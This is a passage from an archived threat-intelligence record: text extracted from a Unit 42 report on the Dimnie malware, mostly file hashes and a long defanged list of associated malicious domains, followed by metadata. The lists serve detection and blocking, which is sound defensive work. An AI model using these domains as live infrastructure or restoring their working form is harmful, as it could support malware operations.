c2af438f72730131c5a1e3e1fe85df13c61182ac\r\n187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3\r\n7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106\r\n44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5\r\n810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431
c8f8d48b6dbf41\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 24 of 40\n\nAppendix B: Associated Domains\r\n1c-host[.]host\r\n1cpred[.]org\r\nallforest[.]pw\r\nantiprt[.]com\r\natonix[.]pw\r\nbabbabbab[.]ru\r\nbabbabbab2[.]ru\r\nbabbebbab[.]com\r\nbabbebbab2[.]com\r\nbabbibbab2[.]ua\r\nbabbihbab[.]host\r\nbabblabbab2[.]link\r\nbabblahbab[.]com\r\nbabblebbab[.]pw\r\nbabblebbab2[.]pw\r\nbabblehbab[.]top\r\nbabblibbab2[.]xyz\r\nbabblihbab[.]link\r\nbabblohbab[.]pw\r\nbabblulbab[.]pw\r\nbabbobbab[.]link\r\nbabbohbab[.]com\r\nbabbolbab[.]host\r\nbabbolbab[.]ru\r\nbabbrabbab2[.]xyz\r\nbabbrebbab[.]rocks\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 25 of 40\n\nbabbrebbab2[.]rocks\r\nbabbrehbab[.]pw\r\nbabbribbab2[.]space\r\nbabbrihbab[.]xyz\r\nbabbrohbab[.]rocks\r\nbabbrulbab[.]rocks\r\nbabbulbab[.]com\r\nbabchabbab[.]org\r\nbabchabbab2[.]org\r\nbabchebbab2[.]ru\r\nbabchehbab[.]in\r\nbabchibbab[.]com\r\nbabchihbab[.]org\r\nbabcholbab[.]org\r\nbabclabbab2[.]space\r\nbabclebbab[.]biz\r\nbabclebbab2[.]biz\r\nbabclehbab[.]rocks\r\nbabclibbab2[.]in\r\nbabclihbab[.]space\r\nbabclohbab[.]biz\r\nbabclulbab[.]biz\r\nbabcrabbab2[.]in\r\nbabcrambab[.]ru\r\nbabcrebbab[.]org\r\nbabcrebbab2[.]org\r\nbabcrehbab[.]biz\r\nbabcribbab[.]ru\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 26 of 
40\n\nbabcrihbab[.]in\r\nbabcrohbab[.]org\r\nbabcruhbab[.]host\r\nbabcrulbab[.]org\r\nbabdabbab[.]ua\r\nbabdabbab2[.]ua\r\nbabdebbab[.]link\r\nbabdebbab2[.]link\r\nbabdibbab2[.]pw\r\nbabdihbab[.]top\r\nbabdobbab[.]xyz\r\nbabdohbab[.]link\r\nbabdolbab[.]top\r\nbabdrabbab2[.]ru\r\nbabdrambab[.]ua\r\nbabdrebbab[.]com\r\nbabdrebbab2[.]com\r\nbabdrehbab[.]org\r\nbabdribbab[.]ua\r\nbabdrihbab[.]host\r\nbabdrohbab[.]com\r\nbabdruhbab[.]top\r\nbabdrulbab[.]com\r\nbabdulbab[.]link\r\nbabfabbab[.]pw\r\nbabfabbab2[.]pw\r\nbabfebbab[.]top\r\nbabfebbab[.]xyz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 27 of 40\n\nbabfebbab2[.]xyz\r\nbabfibbab2[.]rocks\r\nbabfihbab[.]pw\r\nbabflabbab2[.]ua\r\nbabflambab[.]pw\r\nbabflebbab[.]link\r\nbabflebbab2[.]link\r\nbabflehbab[.]com\r\nbabflibbab[.]pw\r\nbabflihbab[.]top\r\nbabflohbab[.]link\r\nbabfluhbab[.]pw\r\nbabflulbab[.]link\r\nbabfobbab[.]space\r\nbabfohbab[.]xyz\r\nbabfolbab[.]pw\r\nbabfrabbab2[.]pw\r\nbabfrebbab[.]xyz\r\nbabfrebbab2[.]xyz\r\nbabfrehbab[.]link\r\nbabfribbab[.]rocks\r\nbabfrihbab[.]pw\r\nbabfrohbab[.]xyz\r\nbabfrulbab[.]xyz\r\nbabfulbab[.]xyz\r\nbabgabbab2[.]rocks\r\nbabgebbab[.]space\r\nbabgebbab2[.]space\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 28 of 40\n\nbabgibbab2[.]biz\r\nbabgihbab[.]rocks\r\nbabglabbab2[.]rocks\r\nbabglebbab[.]space\r\nbabglebbab2[.]space\r\nbabglehbab[.]xyz\r\nbabglibbab[.]biz\r\nbabglihbab[.]rocks\r\nbabglohbab[.]space\r\nbabglulbab[.]space\r\nbabgobbab[.]in\r\nbabgofbab[.]biz\r\nbabgohbab[.]space\r\nbabgrabbab2[.]biz\r\nbabgrebbab[.]in\r\nbabgrebbab2[.]in\r\nbabgrehbab[.]space\r\nbabgribbab[.]org\r\nbabgrihbab[.]biz\r\nbabgrohbab[.]in\r\nbabgrulbab[.]in\r\nbabgulbab[.]space\r\nbabhabbab2[.]biz\r\nbabhebbab[.]in\r\nbabhebbab2[.]in\r\nbabhibbab2[.]org\r\nbabhihbab[.]biz\r\nbabhohbab[.]in\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 29 of 
40\n\nbabhulbab[.]in\r\nbabjabbab2[.]org\r\nbabjebbab[.]ru\r\nbabjebbab2[.]ru\r\nbabjibbab2[.]com\r\nbabjihbab[.]org\r\nbabjohbab[.]host\r\nbabjulbab[.]host\r\nbabkabbab2[.]com\r\nbabkebbab[.]ua\r\nbabkebbab2[.]ua\r\nbabkehbab[.]host\r\nbabkibbab2[.]link\r\nbabkihbab[.]com\r\nbabkohbab[.]top\r\nbabkulbab[.]top\r\nbablabbab2[.]link\r\nbablebbab[.]pw\r\nbablebbab2[.]pw\r\nbablehbab[.]top\r\nbablibbab2[.]xyz\r\nbablihbab[.]link\r\nbablohbab[.]pw\r\nbablulbab[.]pw\r\nbabmabbab[.]xyz\r\nbabmabbab2[.]xyz\r\nbabmebbab[.]rocks\r\nbabmebbab2[.]rocks\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 30 of 40\n\nbabmehbab[.]pw\r\nbabmibbab2[.]space\r\nbabmihbab[.]xyz\r\nbabmilbab[.]pw\r\nbabmohbab[.]rocks\r\nbabmulbab[.]rocks\r\nbabnabbab2[.]space\r\nbabnebbab[.]biz\r\nbabnebbab2[.]biz\r\nbabnehbab[.]rocks\r\nbabnibbab2[.]in\r\nbabnihbab[.]space\r\nbabnohbab[.]biz\r\nbabnulbab[.]biz\r\nbabpabbab2[.]in\r\nbabpebbab[.]org\r\nbabpebbab2[.]org\r\nbabpehbab[.]biz\r\nbabpibbab2[.]ru\r\nbabpihbab[.]in\r\nbabplabbab2[.]org\r\nbabplebbab[.]ru\r\nbabplebbab2[.]ru\r\nbabplehbab[.]in\r\nbabplibbab[.]com\r\nbabplifbab[.]ru\r\nbabplihbab[.]org\r\nbabplohbab[.]host\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 31 of 40\n\nbabplulbab[.]host\r\nbabpohbab[.]org\r\nbabprabbab2[.]com\r\nbabprebbab[.]ua\r\nbabprebbab2[.]ua\r\nbabprehbab[.]host\r\nbabpribbab[.]link\r\nbabprihbab[.]com\r\nbabprulbab[.]top\r\nbabpulbab[.]org\r\nbabrabbab2[.]ru\r\nbabrebbab[.]com\r\nbabrebbab2[.]com\r\nbabrehbab[.]org\r\nbabribbab2[.]ua\r\nbabrihbab[.]host\r\nbabrohbab[.]com\r\nbabrulbab[.]com\r\nbabsabbab2[.]ua\r\nbabsahbab[.]host\r\nbabsebbab[.]link\r\nbabsebbab2[.]link\r\nbabsehbab[.]com\r\nbabsibbab2[.]pw\r\nbabsihbab[.]top\r\nbabskabbab2[.]link\r\nbabskebbab[.]pw\r\nbabskebbab2[.]pw\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 32 of 
40\n\nbabskehbab[.]top\r\nbabskibbab[.]xyz\r\nbabskihbab[.]link\r\nbabslabbab2[.]xyz\r\nbabslebbab2[.]rocks\r\nbabslehbab[.]pw\r\nbabslibbab[.]space\r\nbabslihbab[.]xyz\r\nbabsmabbab2[.]space\r\nbabsmebbab2[.]biz\r\nbabsmehbab[.]rocks\r\nbabsmibbab[.]in\r\nbabsmihbab[.]space\r\nbabsnabbab2[.]in\r\nbabsnebbab2[.]org\r\nbabsnehbab[.]biz\r\nbabsnibbab[.]ru\r\nbabsnihbab[.]in\r\nbabsofbab[.]pw\r\nbabsohbab[.]link\r\nbabspabbab[.]ru\r\nbabspabbab2[.]ru\r\nbabspebbab2[.]com\r\nbabspefbab[.]ru\r\nbabspehbab[.]org\r\nbabspibbab[.]ua\r\nbabspihbab[.]host\r\nbabspolbab[.]host\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 33 of 40\n\nbabstabbab[.]ua\r\nbabstabbab2[.]ua\r\nbabstebbab2[.]link\r\nbabstefbab[.]com\r\nbabstehbab[.]com\r\nbabstibbab[.]pw\r\nbabstihbab[.]top\r\nbabstolbab[.]top\r\nbabstrabbab[.]pw\r\nbabstrabbab2[.]pw\r\nbabstrebbab2[.]xyz\r\nbabstrefbab[.]pw\r\nbabstrehbab[.]link\r\nbabstribbab[.]rocks\r\nbabstrihbab[.]pw\r\nbabstrolbab[.]pw\r\nbabsulbab[.]link\r\nbabswabbab[.]rocks\r\nbabswabbab2[.]rocks\r\nbabswebbab2[.]space\r\nbabswehbab[.]xyz\r\nbabswibbab[.]biz\r\nbabswihbab[.]rocks\r\nbabswolbab[.]rocks\r\nbabtabbab2[.]pw\r\nbabtahbab[.]top\r\nbabtebbab[.]xyz\r\nbabtebbab2[.]xyz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 34 of 
40\n\nbabtehbab[.]link\r\nbabtibbab2[.]rocks\r\nbabtihbab[.]pw\r\nbabtohbab[.]xyz\r\nbabtrabbab[.]biz\r\nbabtrabbab2[.]biz\r\nbabtrebbab2[.]in\r\nbabtrehbab[.]space\r\nbabtribbab[.]org\r\nbabtrihbab[.]biz\r\nbabtrolbab[.]biz\r\nbabtulbab[.]xyz\r\nbabvabbab2[.]rocks\r\nbabvahbab[.]pw\r\nbabvebbab[.]space\r\nbabvebbab2[.]space\r\nbabvehbab[.]xyz\r\nbabvibbab2[.]biz\r\nbabvihbab[.]rocks\r\nbabvohbab[.]space\r\nbabvulbab[.]space\r\nbabwabbab2[.]biz\r\nbabwahbab[.]rocks\r\nbabwebbab[.]in\r\nbabwebbab2[.]in\r\nbabwehbab[.]space\r\nbabwibbab2[.]org\r\nbabwihbab[.]biz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 35 of 40\n\nbabwohbab[.]in\r\nbabwulbab[.]in\r\nbabyabbab2[.]org\r\nbabyahbab[.]biz\r\nbabyebbab[.]ru\r\nbabyebbab2[.]ru\r\nbabyehbab[.]in\r\nbabyibbab2[.]com\r\nbabyihbab[.]org\r\nbabyohbab[.]host\r\nbabyulbab[.]host\r\nbabzabbab2[.]com\r\nbabzahbab[.]org\r\nbabzebbab[.]ua\r\nbabzebbab2[.]ua\r\nbabzehbab[.]host\r\nbabzibbab2[.]link\r\nbabzihbab[.]com\r\nbabzohbab[.]top\r\nbabzulbab[.]top\r\nbannarbor[.]pw\r\nbisquitshore[.]xyz\r\nbitrixon[.]biz\r\nbuhgalter[.]pw\r\nbuhgalter[.]rocks\r\nbuhgalters[.]xyz\r\nbusinessolution[.]site\r\ncheturion[.]org\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 36 of 40\n\nchipacom[.]net\r\ncloneduring[.]pw\r\ncompanysafa[.]biz\r\ncorpofname[.]pw\r\ndatamining[.]press\r\ndersteoyna[.]pw\r\ndovnikus[.]su\r\nefros[.]pw\r\nflashclicks[.]info\r\nforbusinessgo[.]xyz\r\nfortificar[.]net\r\nfracking[.]host\r\ngateoflife[.]pw\r\ngaz[.]rocks\r\ngedealer[.]pw\r\nglobuspp[.]pw\r\ngrandvita[.]pw\r\ngreenlanterns[.]xyz\r\ngreenworldsun[.]xyz\r\nguardomorph[.]com\r\nguwang[.]pw\r\njobforreborn[.]xyz\r\nkokinatsu[.]pw\r\nkukuzaki[.]me\r\nkupala[.]me\r\nlastsnow[.]link\r\nmaradonianos[.]pw\r\nmercurytod[.]pw\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 37 of 
40\n\nmuxa[.]club\r\nmycorpsafa[.]biz\r\nn-nalog78[.]com\r\nnewsunconcept[.]in\r\nnewsupport[.]us\r\nnothingmore[.]us\r\nnovayarabota[.]pw\r\nnvpn[.]pw\r\nodejda77[.]net\r\nokvd[.]biz\r\nolen[.]bid\r\nonechat[.]pw\r\nplacetobuy[.]pw\r\nplatej[.]pw\r\npoplata-da[.]org\r\nportw[.]org\r\npowersand[.]link\r\npricemeet[.]pw\r\npuldisk[.]xyz\r\nrabotadnya[.]pw\r\nraintor[.]pw\r\nricarier[.]org\r\nrosgaz[.]pw\r\nrumoney[.]xyz\r\nsalesforlife[.]top\r\nsalesline[.]top\r\nsam-sam[.]pw\r\nsandstyle[.]biz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 38 of 40\n\nsandw[.]pw\r\nsantrimo[.]lol\r\nseclist[.]site\r\nseclist[.]top\r\nselenaspace[.]space\r\nsellgrax[.]club\r\nsemodo[.]pw\r\nsensetunoespossible[.]cat\r\nshortsell[.]trade\r\nshortselling[.]club\r\nsixgoats[.]pw\r\nsnp500[.]trade\r\nsolotender[.]pw\r\nsslprivate[.]org\r\ntapalulumba[.]com\r\ntaskhoper[.]com\r\ntitleworld[.]pw\r\ntorglend[.]com\r\ntradertop[.]top\r\ntrendkop[.]pw\r\ntyuocruz1312[.]net\r\nuchet[.]pw\r\nuchet[.]space\r\nvisitpalace[.]xyz\r\nvolumexp[.]xyz\r\nvortexenism[.]biz\r\nvpnserv[.]pw\r\nvwv.flashclicks[.]info\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 39 of 40\n\nwinsocket[.]xyz\r\nyearreviews[.]net\r\nIgnite ’17 Security Conference: Vancouver, BC June 12–15, 2017\r\nIgnite ’17 Security Conference is a live, four-day conference designed for today’s security professionals. Hear from\r\ninnovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how\r\nbreach prevention is changing the security industry. 
Visit the Ignite website for more information on tracks, workshops\r\nand marquee sessions.\r\nUpdated 3/30/17: To remove unnecessary IPS Signature number.\r\nSource: http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 40 of 40",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/"
	],
	"report_names": [
		"unit42-dimnie-hiding-plain-sight"
	],
	"threat_actors": [],
	"ts_created_at": 1775434491,
	"ts_updated_at": 1775791272,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/200ff5d67f1ef5daebe43a808410039c47fa3c51.pdf",
		"text": "https://archive.orkl.eu/200ff5d67f1ef5daebe43a808410039c47fa3c51.txt",
		"img": "https://archive.orkl.eu/200ff5d67f1ef5daebe43a808410039c47fa3c51.jpg"
	}
}